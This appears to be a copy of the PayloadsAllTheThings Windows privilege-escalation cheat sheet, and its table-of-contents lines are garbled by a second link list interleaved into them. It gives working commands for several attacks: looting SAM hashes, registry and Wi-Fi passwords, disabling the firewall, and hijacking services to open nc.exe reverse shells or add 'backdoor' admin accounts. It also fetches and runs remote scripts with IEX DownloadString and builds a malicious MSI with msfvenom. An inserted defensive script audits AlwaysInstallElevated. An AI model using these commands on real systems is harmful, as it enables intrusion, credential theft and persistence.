* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks) * [Default Writeable Folders](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#default-writeable-folders)
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) * [EoP - Looting for passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---looting-for-passwords)
* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) * [SAM and SYSTEM files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#sam-and-system-files)
* [EoP - Unquoted Service Paths](#eop---unquoted-service-paths) * [HiveNightmare](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#hivenightmare)
* [EoP - Kernel Exploitation](#eop---kernel-exploitation) * [LAPS Settings](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#laps-settings)
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [Search for file contents](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#search-for-file-contents)
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [Search for a file with a certain filename](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#search-for-a-file-with-a-certain-filename)
* [EoP - Runas](#eop---runas) * [Search the registry for key names and passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#search-the-registry-for-key-names-and-passwords)
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) * [Passwords in unattend.xml](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#passwords-in-unattendxml)
* [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato) * [Wifi passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#wifi-passwords)
* [MS08-067 (NetAPI)](#ms08-067-netapi) * [Sticky Notes passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#sticky-notes-passwords)
* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) * [Passwords stored in services](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#passwords-stored-in-services)
* [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003) * [Passwords stored in Key Manager](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#passwords-stored-in-key-manager)
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [Powershell History](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#powershell-history)
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) * [Powershell Transcript](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#powershell-transcript)
* [Password in Alternate Data Stream](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#password-in-alternate-data-stream)
## Tools * [EoP - Processes Enumeration and Tasks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---processes-enumeration-and-tasks)
* [EoP - Incorrect permissions in services](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---incorrect-permissions-in-services)
- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) * [EoP - Windows Subsystem for Linux (WSL)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---windows-subsystem-for-linux-wsl)
```powershell * [EoP - Unquoted Service Paths](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---unquoted-service-paths)
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks * [EoP - $PATH Interception](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---path-interception)
``` * [EoP - Named Pipes](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---named-pipes)
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) * [EoP - Kernel Exploitation](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---kernel-exploitation)
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) * [EoP - Microsoft Windows Installer](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---microsoft-windows-installer)
```powershell * [AlwaysInstallElevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#alwaysinstallelevated)
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1 * [CustomActions](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#customactions)
``` * [EoP - Insecure GUI apps](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---insecure-gui-apps)
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) * [EoP - Evaluating Vulnerable Drivers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---evaluating-vulnerable-drivers)
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) * [EoP - Printers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---printers)
```powershell * [Universal Printer](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#universal-printer)
./windows-exploit-suggester.py --update * [Bring Your Own Vulnerability](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#bring-your-own-vulnerability)
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt * [EoP - Runas](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---runas)
``` * [EoP - Abusing Shadow Copies](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---abusing-shadow-copies)
- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) * [EoP - From local administrator to NT SYSTEM](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---from-local-administrator-to-nt-system)
- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) * [EoP - Living Off The Land Binaries and Scripts](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---living-off-the-land-binaries-and-scripts)
- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) * [EoP - Impersonation Privileges](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---impersonation-privileges)
- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt) * [Restore A Service Account's Privileges](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#restore-a-service-accounts-privileges)
- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) * [Meterpreter getsystem and alternatives](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#meterpreter-getsystem-and-alternatives)
- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) * [RottenPotato (Token Impersonation)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#rottenpotato-token-impersonation)
```powershell * [Juicy Potato (Abusing the golden privileges)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#juicy-potato-abusing-the-golden-privileges)
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt * [Rogue Potato (Fake OXID Resolver)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#rogue-potato-fake-oxid-resolver))
``` * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#efspotato-ms-efsr-efsrpcopenfileraw))
* [PrintSpoofer (Printer Bug)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#PrintSpoofer-Printer-Bug)))
## Windows Version and Configuration * [EoP - Privileged File Write](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---privileged-file-write)
* [DiagHub](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#diaghub)
```powershell * [UsoDLLLoader](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#usodllloader)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" * [WerTrigger](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#wertrigger)
``` * [WerMgr](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#wermgr)
* [EoP - Privileged File Delete](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---privileged-file-delete)
Extract patchs and updates * [EoP - Common Vulnerabilities and Exposures](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---common-vulnerabilities-and-exposure)
```powershell * [MS08-067 (NetAPI)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms08-067-netapi)
wmic qfe * [MS10-015 (KiTrap0D)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
``` * [MS11-080 (adf.sys)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms11-080-afd.sys---microsoft-windows-xp-2003)
* [MS15-051 (Client Copy Image)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms15-051---microsoft-windows-2003--2008--7--8--2012)
Architecture * [MS16-032](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
* [MS17-010 (Eternal Blue)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms17-010-eternal-blue)
```powershell * [CVE-2019-1388](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#cve-2019-1388)
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% * [EoP - $PATH Interception](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---path-interception)
``` * [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#references)
List all env variables
```powershell
set
Get-ChildItem Env: | ft Key,Value
```
List all drives
```powershell
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
```
## User Enumeration
Get current username
```powershell
echo %USERNAME% || whoami
$env:username
```
List user privilege
```powershell
whoami /priv
```
List all users
```powershell
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
List logon requirements; useable for bruteforcing
```powershell$env:usernadsc
net accounts
```
Get details about a user (i.e. administrator, admin, current user)
```powershell
net user administrator
net user admin
net user %USERNAME%
```
List all local groups
```powershell
net localgroup
Get-LocalGroup | ft Name
```
Get details about a group (i.e. administrators)
```powershell
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
```
## Network Enumeration
List all network interfaces, IP, and DNS.
```powershell
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
List current routing table
```powershell
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
```
List the ARP table
```powershell
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```
List all current connections
```powershell
netstat -ano
```
List firewall state and current configuration
```powershell
netsh advfirewall firewall dump
or
netsh firewall show state
netsh firewall show config
```
List firewall's blocked ports
```powershell
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
```
Disable firewall
```powershell
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
```
List all network shares
```powershell
net share
```
SNMP Configuration
```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
## EoP - Looting for passwords
### SAM and SYSTEM files
The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
```powershell
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```
Generate a hash file for John using `pwdump` or `samdump2`.
```powershell
pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
```
Then crack it with `john -format=NT /root/sam.txt`.
### Search for file contents
```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
```
### Search for a file with a certain filename
```powershell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
```
### Search the registry for key names and passwords
```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
### Read a value of a certain sub key
```powershell
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
```
### Passwords in unattend.xml
Location of the unattend.xml files.
```powershell
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```
Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`.
Example content
```powershell
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
```
Unattend credentials are stored in base64 and can be decoded manually with base64.
```powershell
$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d
SecretSecurePassword1234*
```
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
### IIS Web config
```powershell
Get-Childitem Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```
```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
```
### Other files
```bat
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
```
### Wifi passwords
Find AP SSID
```bat
netsh wlan show profile
```
Get Cleartext Pass
```bat
netsh wlan show profile <SSID> key=clear
```
Oneliner method to extract wifi passwords from all the access point.
```batch
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```
### Passwords stored in services
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
```powershell
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
```
## EoP - Processes Enumeration and Tasks
What processes are running?
```powershell
tasklist /v
net start
sc query
Get-Service
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
```
Which processes are running as "system"
```powershell
tasklist /v /fi "username eq system"
```
Do you have powershell magic?
```powershell
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
```
List installed programs
```powershell
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```
List services
```powershell
net start
wmic service list brief
tasklist /SVC
```
Scheduled tasks
```powershell
schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
Startup tasks
```powershell
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
```
## EoP - Incorrect permissions in services
> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
Often, services are pointing to writeable locations:
- Orphaned installs, not installed anymore but still exist in startup
- DLL Hijacking
- PATH directories with weak permissions
```powershell
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
```
Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
Note to check file permissions you can use `cacls` and `icacls`
> icacls (Windows Vista +)
> cacls (Windows XP)
You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output.
### Example with Windows XP SP1
```powershell
# NOTE: spaces are mandatory for this exploit to work !
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
sc config upnphost depend= ""
net start upnphost
```
If it fails because of a missing dependency, try the following commands.
```powershell
sc config SSDPSRV start=auto
net start SSDPSRV
net stop upnphost
net start upnphost
sc config upnphost depend=""
```
Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals.
```powershell
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
RW SSDPSRV
SERVICE_ALL_ACCESS
RW upnphost
SERVICE_ALL_ACCESS
$ accesschk.exe -ucqv upnphost
upnphost
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
$ sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
$ sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
$ sc stop <vuln-service>
$ sc start <vuln-service>
$ sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
$ sc stop <vuln-service>
$ sc start <vuln-service>
```
## EoP - Windows Subsystem for Linux (WSL)
Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
```powershell
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
```
Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
## EoP - Unquoted Service Paths
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
```powershell
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
```
Metasploit provides the exploit : `exploit/windows/local/trusted_service_path`
### Example
For `C:\Program Files\something\legit.exe`, Windows will try the following paths first:
- `C:\Program.exe`
- `C:\Program Files.exe`
## EoP - Kernel Exploitation
List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
##### #Security Bulletin&nbsp;&nbsp;&nbsp;#KB &nbsp;&nbsp;&nbsp;&nbsp;#Description&nbsp;&nbsp;&nbsp;&nbsp;#Operating System
- [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017)  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8)
- [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464)  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
- [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213)  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
- [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
- [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
- [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010)  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)
- [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)
- [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111)  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)
- [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)  [KB3178466]  [Kernel Driver]  (Win 8.1)
- [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075)  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
- [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034)  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)
- [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032)  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
- [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016)  [KB3136041]  [WebDAV]  (2008/Vista/7)
- [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014)  [K3134228]  [remote code execution]  (2008/Vista/7)
...
- [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)
To cross compile a program from Kali, use the following command.
```powershell
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
```
## EoP - AlwaysInstallElevated
Check if both of these registry values are set to "1".
```bat
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
Then create an MSI package and install it.
```powershell
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
msiexec /quiet /qn /i C:\evil.msi
```
The technique is also available in Metasploit: `exploit/windows/local/always_install_elevated`
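The same two registry values, read from the defender's side. This is an added example and not part of PayloadsAllTheThings: it reports each hive's value, flags the case where both are 1 (the only combination the technique works with), and carries an optional remediation that resets both values to 0. The function names are my own; the registry paths are the ones queried above.

```powershell
# Added example (not from PayloadsAllTheThings): audit and remediate AlwaysInstallElevated.
# The policy is only exploitable when BOTH the HKCU and the HKLM value are 1.

function Get-AlwaysInstallElevatedValue {
    param([Parameter(Mandatory)][string]$Hive)   # 'HKCU' or 'HKLM'
    $path = "${Hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer"
    $item = Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }         # key or value absent: policy not configured
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    $hkcu = Get-AlwaysInstallElevatedValue -Hive 'HKCU'
    $hklm = Get-AlwaysInstallElevatedValue -Hive 'HKLM'
    $hkcuText = if ($null -eq $hkcu) { 'not set' } else { $hkcu }
    $hklmText = if ($null -eq $hklm) { 'not set' } else { $hklm }
    [pscustomobject]@{
        HKCU       = $hkcuText
        HKLM       = $hklmText
        Vulnerable = ($hkcu -eq 1 -and $hklm -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Requires an elevated session for the HKLM key.
    foreach ($hive in 'HKCU', 'HKLM') {
        $path = "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer"
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

$state = Test-AlwaysInstallElevated
$state | Format-List
if ($state.Vulnerable) {
    Write-Warning 'AlwaysInstallElevated is enabled in both hives: any user can install an MSI as SYSTEM.'
    # Disable-AlwaysInstallElevated   # uncomment to remediate (run elevated)
}
```

Reading `$null` back from a hive means the Installer policy key or the value does not exist, which is the secure default; a value of 0 in either hive is also safe, since Windows Installer requires both to be 1 before it elevates.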
## EoP - Insecure GUI apps
An application running as SYSTEM that lets a user spawn a command prompt or browse directories.
Example: "Windows Help and Support" (Windows + F1): search for "command prompt" and click "Click to open Command Prompt".
## EoP - Runas
Use `cmdkey` to list the credentials stored on the machine.
```powershell
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
```
